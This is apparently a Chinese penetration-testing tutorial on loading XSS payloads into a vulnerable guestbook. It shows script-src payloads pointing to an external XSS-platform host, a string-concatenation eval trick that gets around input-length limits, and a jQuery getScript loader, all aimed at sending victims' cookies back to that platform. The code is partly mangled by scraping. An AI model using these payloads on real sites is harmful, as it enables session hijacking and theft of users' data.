#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]

我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!!

文章目录

    • 一、xss漏洞测试-加载payload的方法
      • 1、背景
      • 2、xss平台通用payload加载
      • 3、img 创建script标签加载
      • 4、字符并接加载
      • 5、jquery加载

一、xss漏洞测试-加载payload的方法 1、背景
(1)当我们在测试xss漏洞的时候,一般都是用h1、script等简单的html标签 进行测试样式是否改变或是否弹窗,来检验是否存在xss漏洞。
(2)当在利用这个xss漏洞获取信息的时候就要加载payload,加载payload的方法多种多样,以下是常用的加载技巧。
2、xss平台通用payload加载
(1)有一些 xss平台已经有一些通用的方法。直接拿到用就可以了。
#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
文章图片

#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
文章图片

(2)标准script加载到留言板
payload-1: =http://www.xssplatform.com/7Kar>payload-2: =//www.xssplatform.com/7Kar>

#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
文章图片

(3)反弹cookie信息到xssplatform平台
#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
文章图片

3、img 创建script标签加载
(1)payload:不适用于存储型
#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
文章图片

(3)反弹cookie信息到xssplatform平台
#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
文章图片

4、字符并接加载
(1)这种一般是输入的字符有限制的时候使用
>z='document.' >z=z+'write("' >z=z+' >z=z+' src=https://www.it610.com/article/ht' >z=z+'tp://www.' >z=z+'xssplatform' >z=z+'.com/7' >z=z+'Kar> >z=z+'ript>")' >eval(z)

(2)加载payload到留言板
#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
文章图片

(3)上面的留言板没有生效,我们可以直接把该payload放到本地服务器下的demo2.html内进行测试
#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
文章图片

#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
文章图片

5、jquery加载
(1)加载公有js库,然后利用jquery语法创建一个script标签
="http://code.jquery.com/jquery-1.9.1.min.js"> >$.getScript("//www.xssplatform.com/7Kar");

【#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]】(2)加载payload到留言板
#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
文章图片

(3)反弹cookie信息到xssplatform平台
#|88.网络安全渗透测试—[常规漏洞挖掘与利用篇4]—[xss漏洞测试-加载payload的方法]
文章图片

    推荐阅读